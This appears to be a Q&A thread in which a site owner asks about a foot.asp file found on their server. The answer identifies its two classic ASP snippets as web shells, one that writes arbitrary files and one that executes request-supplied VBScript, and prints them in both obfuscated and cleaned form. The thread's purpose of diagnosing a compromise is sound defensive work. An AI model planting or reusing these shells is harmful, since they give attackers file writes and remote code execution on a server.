# What does this ASP code do?

Tags: asp-classic

I found a file named foot.asp in my server that contains this code.

What does do this code:

```
<span>&nbsp;</span>
<%set s=server.createObject("A"&"do"&"db.St"&"re"&"am")%> 
<%s.Type=2%> 
<%s.Open%> 
<%s.CharSet="utf-8"%> 
<%s.writetext request("hkfox360")%> 
<%s.SaveToFile request("tofile"),2%> 
<%s.Close%> 
<%set s=nothing%>
```

Another code:

```
<a>&nbsp;</a>
<% 
Set o = Server.CreateObject("Sc"&"ri"&"ptC"&"ont"&"rol") 
o.language = "vb"&"scr"&"i"&"pt" 
o.addcode(Request("Sj"&"C"&"od"&"e"))
o.run "e",Server,Response,Request,Application,Session,Error
%>
```

Comment: http://www.w3schools.com/asp/ado_ref_stream.asp and 2nd should fail I think???

Comment: Is this from a compromised site?, only reason I ask is the blatant attempt to hide the fact they are using `ADODB.Stream` to save files to the File System but concatenating the name (probably to negate scanning software).

Comment: I don't know... This is what I'm trying to find. I found this file on my server and I don't know why is it there.

Comment: @Otix I would suggest you have been compromised, anything that uses `<%set s=server.createObject("A"&"do"&"db.St"&"re"&"am")%> ` instead of `<%set s=server.createObject("Adodb.Stream")%>` is clearly trying to hide it's true intentions.

Comment: Thanks @Lankymart. I deleted all this files.

Comment: @DeeMac I think that is an unfair assumption in this case, as you will not find many search results for `"A"&"do"&"db.St"&"re"&"am"`, the author is purposefully trying to hide the script using some extremely poor obfuscation. I think the OP is well within their rights to ask what the script is doing.

Answer (score 5, accepted):

If you do not know where these files have come from you should assume that your website has been **COMPROMISED**.

There are many tools out there for script kiddies who want to wreak havoc on poorly secured websites, they check for common security flaws and bad practices that leave sites vulnerable to attack such as SQL Injection for example.

In your particular case a file has been saved on to your server and appears to be harvesting information.

**Snippet 1** *(without the concatenation used to negate scanners)*

```vb
<span>&nbsp;</span>
<%set s=server.createObject("Adodb.Stream")%> 
<%s.Type=2%> 
<%s.Open%> 
<%s.CharSet="utf-8"%> 
<%s.writetext request("hkfox360")%> 
<%s.SaveToFile request("tofile"),2%> 
<%s.Close%> 
<%set s=nothing%>
```

Is using an `ADODB.Stream` object to write the contents of the `Request("hkfox360")` into a file which is defined by the `Request("tofile")` value. This suggests there must be a "client script" element to the puzzle that is posting information to this file on your server.

**Snippet 2** *(without the concatenation used to negate scanners)*

```vb
<a>&nbsp;</a>
<% 
Set o = Server.CreateObject("ScriptControl") 
o.language = "vbscript" 
o.addcode(Request("SjCode"))
o.run "e",Server,Response,Request,Application,Session,Error
%>
```

Is using the Microsoft `ScriptControl` to execute a Sub Procedure called `e` and pass the parameters `Server`, `Response`, `Request`, `Application`, `Session` and `Error` objects which basically gives them every context they could possibly want from your website application.

> My advice is remove these files (I would at the very least move them to a secure location so they can be analysed) then do a security audit to workout how the site was compromised.